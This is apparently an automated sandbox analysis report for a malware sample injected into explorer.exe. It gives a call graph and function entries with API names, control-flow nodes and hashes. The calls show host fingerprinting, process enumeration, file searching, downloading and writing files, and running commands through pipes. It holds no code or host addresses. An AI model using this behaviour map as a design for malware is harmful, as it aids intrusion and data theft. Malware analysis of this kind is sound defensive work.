3057ddf 3904 3057dd8 3903->3904 3905 30582b4 NtFreeVirtualMemory 3903->3905 3904->3884 3905->3904 3906 3057d4b VirtualAlloc 3907 3057d7e 3906->3907 3908 305b388 NtAllocateVirtualMemory 3907->3908 3909 3057d88 CreateThread 3908->3909 3910 30582b4 NtFreeVirtualMemory 3909->3910 3910->3904 4118 305830c 3911->4118 3913 3057963 3914 3058bdc 3 API calls 3913->3914 3921 3057970 3913->3921 3915 30579ba wsprintfW 3914->3915 3916 30582b4 NtFreeVirtualMemory 3915->3916 3917 30579df 3916->3917 3918 3057a07 MultiByteToWideChar 3917->3918 3919 3057a84 21 API calls 3918->3919 3920 3057a4f 3919->3920 3920->3921 4126 305b8d4 3920->4126 3921->3884 3924 3054357 3923->3924 3925 305434a SetEvent 3923->3925 3926 3054361 ReleaseMutex CloseHandle 3924->3926 3927 305437b 3924->3927 3925->3924 3926->3927 3927->3873 3928->3873 3930 30577a7 3929->3930 3931 305830c 4 API calls 3930->3931 3932 30577d3 3931->3932 3933 3058bdc 3 API calls 3932->3933 3941 30577e0 3932->3941 3934 305782a wsprintfW 3933->3934 3935 30582b4 NtFreeVirtualMemory 3934->3935 3936 305784f 3935->3936 3937 3057874 MultiByteToWideChar 3936->3937 3938 3057a84 21 API calls 3937->3938 3939 30578b9 3938->3939 3940 30578d9 MultiByteToWideChar 3939->3940 3940->3941 3942 305790d 3940->3942 3941->3884 3942->3941 4131 305b9a0 3942->4131 3945 305b388 NtAllocateVirtualMemory 3944->3945 3946 3052d94 3945->3946 3947 305be64 3 API calls 3946->3947 3948 3052ddd 3947->3948 3949 3052de9 Process32First 3948->3949 3950 30531fb 3948->3950 3951 3052e34 3949->3951 3952 3052e13 Process32Next 3949->3952 3953 305be64 3 API calls 3950->3953 3955 305b388 NtAllocateVirtualMemory 3951->3955 3952->3951 3952->3952 3954 305320c 3953->3954 3954->3884 3956 3052e44 Process32First 3955->3956 3957 3052e60 3956->3957 3958 3052ead Process32First 3956->3958 3959 3052e68 Process32Next 3957->3959 3960 30531e6 3958->3960 3965 3052ec8 3958->3965 3959->3958 3959->3959 3961 30582b4 NtFreeVirtualMemory 3960->3961 3962 30531f0 CloseHandle 3961->3962 3962->3950 3963 30531cb Process32Next 3963->3960 3963->3965 3964 305be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3964->3965 3965->3963 3965->3964 3966 3052fe0 wsprintfA 3965->3966 3967 305be64 3 API calls 3966->3967 3969 305300d 3967->3969 3968 305be64 3 API calls 3968->3969 3969->3968 3970 3053086 wsprintfA 3969->3970 3971 305be64 3 API calls 3970->3971 3974 30530b3 3971->3974 3973 305be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3973->3974 3974->3973 3975 305be64 3 API calls 3974->3975 4140 305260c CreateToolhelp32Snapshot 3974->4140 3975->3963 3976->3884 3978 305b388 NtAllocateVirtualMemory 3977->3978 3979 3052b3b 3978->3979 3980 305be64 3 API calls 3979->3980 3981 3052b7b 3980->3981 4156 3058398 3981->4156 3983 3052cf3 3984 30582b4 NtFreeVirtualMemory 3983->3984 3986 3052d05 3983->3986 3984->3986 3985 3052b8e 3985->3983 3987 305be64 3 API calls 3985->3987 3988 305be64 3 API calls 3986->3988 3989 3052bda FindFirstFileA 3987->3989 3990 3052d40 3988->3990 3989->3983 3996 3052bfe 3989->3996 3990->3884 3991 3052ccd FindNextFileA 3992 3052ce8 FindClose 3991->3992 3991->3996 3992->3983 3993 305be64 3 API calls 3993->3996 3994 3052c98 wsprintfA 3995 305be64 3 API calls 3994->3995 3995->3996 3996->3991 3996->3993 3996->3994 3998 3057e17 3997->3998 3999 3057e24 MultiByteToWideChar 3998->3999 4000 3057a84 21 API calls 3999->4000 4002 3057e75 4000->4002 4001 3057f40 4001->3884 4002->4001 4003 305b388 NtAllocateVirtualMemory 4002->4003 4004 3057eb6 4003->4004 4005 305b388 NtAllocateVirtualMemory 4004->4005 4006 3057ed9 CreateThread 4005->4006 4007 30582b4 NtFreeVirtualMemory 4006->4007 4007->4001 4009 3057f6f 4008->4009 4010 3057f7c MultiByteToWideChar 4009->4010 4011 3057a84 21 API calls 4010->4011 4013 3057fcd 4011->4013 4012 30580a4 4012->3884 4013->4012 4014 305b388 NtAllocateVirtualMemory 4013->4014 4015 305800e 4014->4015 4164 305c7dc 4015->4164 4018 305b388 NtAllocateVirtualMemory 4019 305803d CreateThread 4018->4019 4020 30582b4 NtFreeVirtualMemory 4019->4020 4020->4012 4026 3054a2c 4021->4026 4022 3054acc 4022->3884 4023 3054aec MultiByteToWideChar 4024 305830c 4 API calls 4023->4024 4024->4026 4025 3054b7d MultiByteToWideChar 4025->4026 4026->4022 4026->4023 4026->4025 4027 3054bd6 wsprintfW 4026->4027 4028 3057a84 21 API calls 4027->4028 4028->4026 4031 3057ac4 4029->4031 4036 3057b28 4031->4036 4037 305c00c NtAllocateVirtualMemory 4031->4037 4040 305900c 4031->4040 4060 30576d8 4031->4060 4072 3058240 4031->4072 4032 3057c5d 4034 3057c68 4032->4034 4035 30582b4 NtFreeVirtualMemory 4032->4035 4033 30582b4 NtFreeVirtualMemory 4033->4032 4034->3903 4034->3906 4035->4034 4036->4032 4036->4033 4037->4031 4041 305904b InternetOpenW 4040->4041 4042 3059086 4041->4042 4043 305908b 4041->4043 4045 305923d InternetCloseHandle 4042->4045 4046 3059248 4042->4046 4078 30555dc 4043->4078 4045->4046 4048 3059250 InternetCloseHandle 4046->4048 4049 305925b 4046->4049 4048->4049 4049->4031 4050 30590f4 4052 3059106 4050->4052 4053 30582b4 NtFreeVirtualMemory 4050->4053 4054 3059118 InternetOpenUrlW 4052->4054 4055 30582b4 NtFreeVirtualMemory 4052->4055 4053->4052 4054->4042 4057 3059154 4054->4057 4055->4054 4056 305915f InternetReadFile 4056->4057 4057->4042 4057->4056 4058 305b388 NtAllocateVirtualMemory 4057->4058 4059 305b648 3 API calls 4057->4059 4058->4057 4059->4057 4100 30592f8 4060->4100 4065 305774e 4068 30582b4 NtFreeVirtualMemory 4065->4068 4071 30576fb 4065->4071 4066 305bf78 3 API calls 4067 3057729 4066->4067 4067->4065 4069 305772d 4067->4069 4068->4071 4070 30582b4 NtFreeVirtualMemory 4069->4070 4070->4071 4071->4031 4112 30580b8 4072->4112 4075 305827f 4075->4031 4079 3055614 4078->4079 4080 305b388 NtAllocateVirtualMemory 4079->4080 4081 305563a 4080->4081 4082 305b388 NtAllocateVirtualMemory 4081->4082 4083 3055650 InternetCrackUrlW 4082->4083 4084 30556ac 4083->4084 4085 30556c6 4083->4085 4086 30582b4 NtFreeVirtualMemory 4084->4086 4085->4042 4085->4050 4089 305c860 4085->4089 4087 30556b9 4086->4087 4088 30582b4 NtFreeVirtualMemory 4087->4088 4088->4085 4090 305c894 InternetConnectW 4089->4090 4091 305c8df 4089->4091 4090->4091 4094 305c8e4 HttpOpenRequestW 4090->4094 4092 305c9d5 InternetCloseHandle 4091->4092 4093 305c9e0 4091->4093 4092->4093 4095 305c9f3 4093->4095 4096 305c9e8 InternetCloseHandle 4093->4096 4094->4091 4097 305c936 HttpSendRequestW 4094->4097 4095->4050 4096->4095 4098 305c955 InternetQueryOptionW InternetSetOptionW 4097->4098 4099 305c9a7 HttpSendRequestW 4097->4099 4098->4099 4099->4091 4101 305c00c NtAllocateVirtualMemory 4100->4101 4103 3059318 4101->4103 4102 30576f7 4102->4071 4105 305bf78 4102->4105 4103->4102 4104 30582b4 NtFreeVirtualMemory 4103->4104 4104->4102 4106 305bf90 4105->4106 4109 305bf0c 4106->4109 4108 3057713 4108->4065 4108->4066 4110 305b704 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4109->4110 4111 305bf40 4110->4111 4111->4108 4113 30580f9 4112->4113 4114 305810b RtlInitUnicodeString NtCreateFile 4113->4114 4115 30581b1 4114->4115 4115->4075 4116 30581c8 NtWriteFile 4115->4116 4117 3058230 NtClose 4116->4117 4117->4075 4119 305b470 4118->4119 4120 3058326 SHGetFolderPathW 4119->4120 4121 305834f 4120->4121 4122 305c00c NtAllocateVirtualMemory 4121->4122 4124 305835b 4122->4124 4123 3058368 4123->3913 4124->4123 4125 305bf78 3 API calls 4124->4125 4125->4123 4127 305b8ee 4126->4127 4128 305b926 CreateProcessW 4127->4128 4129 305b976 4128->4129 4130 305b97a CloseHandle CloseHandle 4128->4130 4129->3921 4130->4129 4132 305b9c0 4131->4132 4133 305ba1e 4132->4133 4134 305ba78 4132->4134 4135 305ba53 wsprintfW 4133->4135 4136 305baad wsprintfW 4134->4136 4137 305bac8 CreateProcessW 4135->4137 4136->4137 4138 305bb1f CloseHandle CloseHandle 4137->4138 4139 305bb1b 4137->4139 4138->4139 4139->3941 4141 305297e 4140->4141 4142 3052659 Process32First 4140->4142 4141->3974 4142->4141 4145 305267f 4142->4145 4143 3052963 Process32Next 4143->4141 4143->4145 4144 305be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4144->4145 4145->4143 4145->4144 4146 305279f wsprintfA 4145->4146 4147 305be64 3 API calls 4146->4147 4149 30527cf 4147->4149 4148 305be64 3 API calls 4148->4149 4149->4148 4150 3052839 wsprintfA 4149->4150 4151 305be64 3 API calls 4150->4151 4154 3052869 4151->4154 4152 305260c 3 API calls 4152->4154 4153 305be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4153->4154 4154->4152 4154->4153 4155 305be64 3 API calls 4154->4155 4155->4143 4157 305b470 4156->4157 4158 30583b2 SHGetFolderPathA 4157->4158 4159 30583db 4158->4159 4160 305bfc0 NtAllocateVirtualMemory 4159->4160 4162 30583e7 4160->4162 4161 30583f4 4161->3985 4162->4161 4163 305be64 3 API calls 4162->4163 4163->4161 4165 305c7ef 4164->4165 4167 3058033 4164->4167 4166 305b388 NtAllocateVirtualMemory 4165->4166 4166->4167 4167->4018 4169 3054411 4168->4169 4170 305bfc0 NtAllocateVirtualMemory 4169->4170 4171 3054444 4170->4171 4172 30544a4 4171->4172 4174 3054451 4171->4174 4175 305448f MessageBoxA 4171->4175 4173 30582b4 NtFreeVirtualMemory 4172->4173 4173->4174 4175->4172 4200 3053304 4201 3053349 4200->4201 4259 3053322 4200->4259 4202 305b388 NtAllocateVirtualMemory 4201->4202 4203 3053353 4202->4203 4203->4259 4318 3052164 4203->4318 4205 3053406 4206 3052164 21 API calls 4205->4206 4207 305349e 4206->4207 4208 3052164 21 API calls 4207->4208 4209 3053537 4208->4209 4210 3052164 21 API calls 4209->4210 4211 30535d0 4210->4211 4212 3052164 21 API calls 4211->4212 4213 3053669 4212->4213 4214 3052164 21 API calls 4213->4214 4215 3053702 4214->4215 4216 3052164 21 API calls 4215->4216 4217 305379b 4216->4217 4218 3052164 21 API calls 4217->4218 4219 3053834 4218->4219 4220 3052164 21 API calls 4219->4220 4221 30538cd 4220->4221 4222 3052164 21 API calls 4221->4222 4223 3053966 4222->4223 4224 3052164 21 API calls 4223->4224 4225 30539ff 4224->4225 4226 305b388 NtAllocateVirtualMemory 4225->4226 4227 3053a12 4226->4227 4228 3056fc0 NtAllocateVirtualMemory 4227->4228 4229 3053ad6 4227->4229 4227->4259 4236 3053a63 4228->4236 4230 3053b77 4229->4230 4231 3056fc0 NtAllocateVirtualMemory 4229->4231 4232 3056fc0 NtAllocateVirtualMemory 4230->4232 4233 3053c18 4230->4233 4241 3053b04 4231->4241 4242 3053ba5 4232->4242 4234 3053cb9 4233->4234 4235 3056fc0 NtAllocateVirtualMemory 4233->4235 4237 3056fc0 NtAllocateVirtualMemory 4234->4237 4238 3053d5a 4234->4238 4249 3053c46 4235->4249 4236->4229 4247 305be64 3 API calls 4236->4247 4250 3053ce7 4237->4250 4239 3053dfb 4238->4239 4240 3056fc0 NtAllocateVirtualMemory 4238->4240 4243 3056fc0 NtAllocateVirtualMemory 4239->4243 4244 3053e9c 4239->4244 4261 3053d88 4240->4261 4241->4230 4255 305be64 3 API calls 4241->4255 4242->4233 4257 305be64 3 API calls 4242->4257 4263 3053e29 4243->4263 4245 3053f3d 4244->4245 4248 3056fc0 NtAllocateVirtualMemory 4244->4248 4251 3056fc0 NtAllocateVirtualMemory 4245->4251 4254 3053fde 4245->4254 4246 3054138 4340 3052988 4246->4340 4252 3053abd 4247->4252 4272 3053eca 4248->4272 4249->4234 4267 305be64 3 API calls 4249->4267 4250->4238 4269 305be64 3 API calls 4250->4269 4275 3053f6b 4251->4275 4258 305be64 3 API calls 4252->4258 4256 305408b 4254->4256 4260 3056fc0 NtAllocateVirtualMemory 4254->4260 4262 3053b5e 4255->4262 4256->4246 4264 3056fc0 NtAllocateVirtualMemory 4256->4264 4265 3053bff 4257->4265 4266 3053acc 4258->4266 4284 305400c 4260->4284 4261->4239 4278 305be64 3 API calls 4261->4278 4268 305be64 3 API calls 4262->4268 4263->4244 4281 305be64 3 API calls 4263->4281 4290 30540b9 4264->4290 4270 305be64 3 API calls 4265->4270 4271 30582b4 NtFreeVirtualMemory 4266->4271 4273 3053ca0 4267->4273 4274 3053b6d 4268->4274 4276 3053d41 4269->4276 4277 3053c0e 4270->4277 4271->4229 4272->4245 4287 305be64 3 API calls 4272->4287 4279 305be64 3 API calls 4273->4279 4280 30582b4 NtFreeVirtualMemory 4274->4280 4275->4254 4295 305be64 3 API calls 4275->4295 4282 305be64 3 API calls 4276->4282 4283 30582b4 NtFreeVirtualMemory 4277->4283 4285 3053de2 4278->4285 4286 3053caf 4279->4286 4280->4230 4291 3053e83 4281->4291 4292 3053d50 4282->4292 4283->4233 4284->4256 4298 305be64 3 API calls 4284->4298 4288 305be64 3 API calls 4285->4288 4289 30582b4 NtFreeVirtualMemory 4286->4289 4293 3053f24 4287->4293 4294 3053df1 4288->4294 4289->4234 4290->4246 4305 305be64 3 API calls 4290->4305 4296 305be64 3 API calls 4291->4296 4297 30582b4 NtFreeVirtualMemory 4292->4297 4299 305be64 3 API calls 4293->4299 4300 30582b4 NtFreeVirtualMemory 4294->4300 4301 3053fc5 4295->4301 4302 3053e92 4296->4302 4297->4238 4303 305406c 4298->4303 4304 3053f33 4299->4304 4300->4239 4306 305be64 3 API calls 4301->4306 4307 30582b4 NtFreeVirtualMemory 4302->4307 4308 305be64 3 API calls 4303->4308 4309 30582b4 NtFreeVirtualMemory 4304->4309 4310 3054119 4305->4310 4311 3053fd4 4306->4311 4307->4244 4312 305407e 4308->4312 4309->4245 4313 305be64 3 API calls 4310->4313 4314 30582b4 NtFreeVirtualMemory 4311->4314 4315 30582b4 NtFreeVirtualMemory 4312->4315 4316 305412b 4313->4316 4314->4254 4315->4256 4317 30582b4 NtFreeVirtualMemory 4316->4317 4317->4246 4319 30521e4 4318->4319 4320 30521f6 6 API calls 4319->4320 4366 3052134 4320->4366 4322 3052333 CreateProcessW 4323 305b388 NtAllocateVirtualMemory 4322->4323 4324 3052399 4323->4324 4325 305b388 NtAllocateVirtualMemory 4324->4325 4334 30523d6 4325->4334 4326 30525e8 4329 30525fa 4326->4329 4331 30582b4 NtFreeVirtualMemory 4326->4331 4327 3052401 PeekNamedPipe 4330 30524b9 PeekNamedPipe 4327->4330 4327->4334 4328 30525a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4328->4326 4329->4205 4332 3052569 GetExitCodeProcess 4330->4332 4330->4334 4331->4329 4333 305258f 4332->4333 4332->4334 4333->4328 4334->4326 4334->4327 4334->4328 4334->4330 4334->4332 4336 3052468 ReadFile 4334->4336 4337 3052518 ReadFile 4334->4337 4367 305c704 NtDelayExecution 4334->4367 4338 305be64 3 API calls 4336->4338 4339 305be64 3 API calls 4337->4339 4338->4330 4339->4332 4341 3052b17 4340->4341 4342 305299d 4340->4342 4341->4259 4342->4341 4343 30529ca 4342->4343 4344 30582b4 NtFreeVirtualMemory 4342->4344 4345 30529ea 4343->4345 4346 30582b4 NtFreeVirtualMemory 4343->4346 4344->4343 4347 3052a0a 4345->4347 4348 30582b4 NtFreeVirtualMemory 4345->4348 4346->4345 4349 3052a2a 4347->4349 4350 30582b4 NtFreeVirtualMemory 4347->4350 4348->4347 4351 3052a4a 4349->4351 4352 30582b4 NtFreeVirtualMemory 4349->4352 4350->4349 4353 3052a6a 4351->4353 4355 30582b4 NtFreeVirtualMemory 4351->4355 4352->4351 4354 3052a8a 4353->4354 4356 30582b4 NtFreeVirtualMemory 4353->4356 4357 3052aaa 4354->4357 4358 30582b4 NtFreeVirtualMemory 4354->4358 4355->4353 4356->4354 4359 3052aca 4357->4359 4360 30582b4 NtFreeVirtualMemory 4357->4360 4358->4357 4361 3052aea 4359->4361 4362 30582b4 NtFreeVirtualMemory 4359->4362 4360->4359 4363 3052b0a 4361->4363 4365 30582b4 NtFreeVirtualMemory 4361->4365 4362->4361 4364 30582b4 NtFreeVirtualMemory 4363->4364 4364->4341 4365->4363 4366->4322 4367->4334 4368 3054384 4369 30543a5 4368->4369 4370 30543a7 4368->4370 4372 30543c4 4370->4372 4373 30541b4 129 API calls 4372->4373 4374 30543cd 4373->4374 4375 30543eb 4374->4375 4377 305c704 NtDelayExecution 4374->4377 4375->4369 4377->4374 4411 305bb44 4412 305bbc5 4411->4412 4413 305bb62 4411->4413 4414 305bb8e CreateFileMappingA 4413->4414 4414->4412 4415 305bbcc MapViewOfFile 4414->4415 4415->4412 4417 305bbff 4415->4417 4416 305bcd5 VirtualFree 4418 30582b4 NtFreeVirtualMemory 4416->4418 4417->4416 4419 305b388 NtAllocateVirtualMemory 4417->4419 4420 305bd06 UnmapViewOfFile CloseHandle 4418->4420 4421 305bc35 4419->4421 4420->4412 4422 305be64 3 API calls 4421->4422 4423 305bc87 4422->4423 4424 305be64 3 API calls 4423->4424 4425 305bc99 4424->4425 4426 305bfc0 NtAllocateVirtualMemory 4425->4426 4427 305bcaf 4426->4427 4428 30582b4 NtFreeVirtualMemory 4427->4428 4429 305bccb 4428->4429 4430 30582b4 NtFreeVirtualMemory 4429->4430 4430->4416 4431 305c5c0 4432 305c641 4431->4432 4433 305c5de 4431->4433 4434 305c60a CreateFileMappingA 4433->4434 4434->4432 4435 305c648 MapViewOfFile 4434->4435 4435->4432 4436 305c67b 4435->4436 4441 305ca9c 4436->4441 4439 30582b4 NtFreeVirtualMemory 4440 305c6d1 UnmapViewOfFile CloseHandle 4439->4440 4440->4432 4442 305c6a0 VirtualFree 4441->4442 4443 305caad 4441->4443 4442->4439 4447 305ca68 4443->4447 4446 30582b4 NtFreeVirtualMemory 4446->4442 4448 305ca7d 4447->4448 4449 305ca8b 4447->4449 4450 305ca68 NtFreeVirtualMemory 4448->4450 4451 30582b4 NtFreeVirtualMemory 4449->4451 4450->4449 4452 305ca95 4451->4452 4452->4446 4176 305545d 4177 3055265 4176->4177 4186 30553a4 4176->4186 4179 3055315 4177->4179 4180 3055292 4177->4180 4178 30582b4 NtFreeVirtualMemory 4194 3055456 4178->4194 4182 305532e HttpOpenRequestA 4179->4182 4181 30552ab HttpOpenRequestA 4180->4181 4185 305539c 4181->4185 4182->4185 4185->4186 4187 30553d6 4185->4187 4188 30553b3 InternetSetOptionA 4185->4188 4186->4178 4186->4194 4189 3055424 HttpSendRequestA 4187->4189 4193 30553e0 4187->4193 4188->4187 4190 3055443 4189->4190 4190->4186 4191 305544c 4190->4191 4192 30582b4 NtFreeVirtualMemory 4191->4192 4192->4194 4195 30553fb HttpSendRequestA 4193->4195 4195->4190 4453 305b86c 4454 305b880 4453->4454 4455 305b8c6 4453->4455 4456 305b89e VirtualFree 4454->4456 4457 30582b4 NtFreeVirtualMemory 4456->4457 4457->4455 4196 3058a58 4197 3058a72 4196->4197 4198 3058a79 4196->4198 4198->4197 4199 3058b63 GetProcAddress GetProcAddressForCaller 4198->4199 4199->4197 4378 3057528 4379 3057548 4378->4379 4380 305754f 4378->4380 4380->4379 4381 3056fc0 NtAllocateVirtualMemory 4380->4381 4382 30576a7 4381->4382 4384 305c734 4382->4384 4385 305c74f 4384->4385 4387 305c74a 4384->4387 4386 305b388 NtAllocateVirtualMemory 4385->4386 4386->4387 4387->4379 4408 30544b8 4409 30543c4 129 API calls 4408->4409 4410 30544c1 4409->4410 4388 305922b 4389 3059086 4388->4389 4390 305904b InternetOpenW 4388->4390 4391 305923d InternetCloseHandle 4389->4391 4392 3059248 4389->4392 4390->4389 4393 305908b 4390->4393 4391->4392 4394 3059250 InternetCloseHandle 4392->4394 4395 305925b 4392->4395 4396 30555dc 3 API calls 4393->4396 4394->4395 4397 30590ca 4396->4397 4397->4389 4398 30590f4 4397->4398 4399 305c860 8 API calls 4397->4399 4400 3059106 4398->4400 4401 30582b4 NtFreeVirtualMemory 4398->4401 4399->4398 4402 3059118 InternetOpenUrlW 4400->4402 4403 30582b4 NtFreeVirtualMemory 4400->4403 4401->4400 4402->4389 4405 3059154 4402->4405 4403->4402 4404 305915f InternetReadFile 4404->4405 4405->4389 4405->4404 4406 305b388 NtAllocateVirtualMemory 4405->4406 4407 305b648 3 API calls 4405->4407 4406->4405 4407->4405 4458 305696b 4483 3055b7a new[] 4458->4483 4459 30569a2 GetExitCodeThread 4459->4483 4460 30569de GetExitCodeThread 4460->4483 4461 3055ba7 4462 305c704 NtDelayExecution 4462->4483 4463 305b388 NtAllocateVirtualMemory 4463->4483 4464 3055484 3 API calls 4464->4483 4465 305bfc0 NtAllocateVirtualMemory 4465->4483 4466 3056404 wsprintfA 4466->4483 4467 3055f36 wsprintfA 4467->4483 4468 3056025 wsprintfA 4468->4483 4469 305be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4469->4483 4470 3058424 11 API calls 4470->4483 4471 305b770 NtAllocateVirtualMemory 4471->4483 4472 305b388 NtAllocateVirtualMemory 4473 3056187 WideCharToMultiByte 4472->4473 4475 305be64 3 API calls 4473->4475 4474 305b388 NtAllocateVirtualMemory 4477 3056243 WideCharToMultiByte 4474->4477 4475->4483 4476 305b388 NtAllocateVirtualMemory 4479 30562ff WideCharToMultiByte 4476->4479 4478 305be64 3 API calls 4477->4478 4478->4483 4480 305be64 3 API calls 4479->4480 4480->4483 4481 3056fc0 NtAllocateVirtualMemory 4481->4483 4482 30582b4 NtFreeVirtualMemory 4482->4483 4483->4459 4483->4460 4483->4461 4483->4462 4483->4463 4483->4464 4483->4465 4483->4466 4483->4467 4483->4468 4483->4469 4483->4470 4483->4471 4483->4472 4483->4474 4483->4476 4483->4481 4483->4482 4484 3054e28 14 API calls 4483->4484 4485 3058bdc GetCursorPos GetTickCount RtlRandom 4483->4485 4486 3056cfc NtAllocateVirtualMemory 4483->4486 4487 3055734 73 API calls 4483->4487 4484->4483 4485->4483 4486->4483 4487->4483

                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                      Function 03058424 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 0 3058424-305845d call 305b388 3 3058466-3058487 GetAdaptersInfo 0->3 4 305845f-3058461 0->4 6 3058676-305867c 3->6 7 305848d-30584c0 call 305b388 GetAdaptersInfo call 305b4cc 3->7 5 30587ea-30587f1 4->5 9 305867e-3058683 call 30582b4 6->9 10 3058688-30586a6 call 305b388 6->10 16 30584c5-30584c8 7->16 9->10 17 30587e5 10->17 18 30586ac-30586c3 GetComputerNameExA 10->18 21 30584d9-30584e1 16->21 22 30584ca-30584d7 16->22 17->5 19 30586c5-30586dc call 305b4cc 18->19 20 3058729-3058740 GetComputerNameExA 18->20 33 30586ed-30586f5 19->33 34 30586de-30586eb 19->34 24 3058746-305874b 20->24 25 30587db-30587e0 call 30582b4 20->25 26 30584e6-30584fe wsprintfA 21->26 22->26 30 305874d-305875a 24->30 31 305875c-3058763 24->31 25->17 27 3058502-305850a 26->27 32 3058516-3058525 27->32 35 305876b-3058782 call 305b4cc 30->35 31->35 36 30585f2-3058609 call 305b4cc 32->36 37 305852b-3058530 32->37 38 30586fa-3058725 wsprintfA 33->38 34->38 47 3058784-3058794 35->47 48 3058796-305879e 35->48 49 305860b-3058618 36->49 50 305861a-3058622 36->50 41 3058573-305858a call 305b4cc 37->41 42 3058532-3058549 call 305b4cc 37->42 38->20 57 305858c-3058599 41->57 58 305859b-30585a3 41->58 55 305854b-3058558 42->55 56 305855a-3058562 42->56 53 30587a6-30587d7 wsprintfA 47->53 48->53 54 3058627-3058659 wsprintfA 49->54 50->54 53->25 59 305865d-3058670 54->59 60 305865b 54->60 61 3058567-3058571 55->61 56->61 62 30585a8-30585ad 57->62 58->62 59->6 59->27 60->6 63 30585b2-30585ed wsprintfA 61->63 62->63 63->32
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI ref: 03058470
                                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI ref: 030584A7
                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 030584F0
                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 030585DB
                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0305863F
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                      • String ID: o
                                                                                                                                                                                                                                                                      • API String ID: 2074107575-252678980
                                                                                                                                                                                                                                                                      • Opcode ID: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
                                                                                                                                                                                                                                                                      • Instruction ID: ae3974ad7e363a4276b6dee5088b009c394f24022a855e94f709c924305512d6
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FA1A77620AB848ADB60CB15E49036BB7A4F788784F444525FE8E83B69EF7CC654CF44
                                                                                                                                                                                                                                                                      Function 03057274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 162 3057274-30572ab GetAdaptersInfo 163 30572ad-30572cd call 305b388 GetAdaptersInfo 162->163 164 30572f8-30572fe 162->164 171 30572d1-30572dd 163->171 166 3057300-3057305 call 30582b4 164->166 167 305730a 164->167 166->167 170 305730f-3057313 167->170 172 30572e3-30572f6 171->172 173 30572df-30572e1 171->173 172->164 172->171 173->170
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI ref: 0305729C
                                                                                                                                                                                                                                                                        • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI ref: 030572C7
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                      • String ID: o
                                                                                                                                                                                                                                                                      • API String ID: 2718687846-252678980
                                                                                                                                                                                                                                                                      • Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                                                                                                      • Instruction ID: 4a238ca3a3d571ee233ce19bd2fb95e593e9af9681406d87dd34b54031fe3d24
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9101B37660AB4486DB70DB15E49435EB7A0F3C8BA8F480265FA8D47B28DB7CC685CF04
                                                                                                                                                                                                                                                                      Function 0305A8E0 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
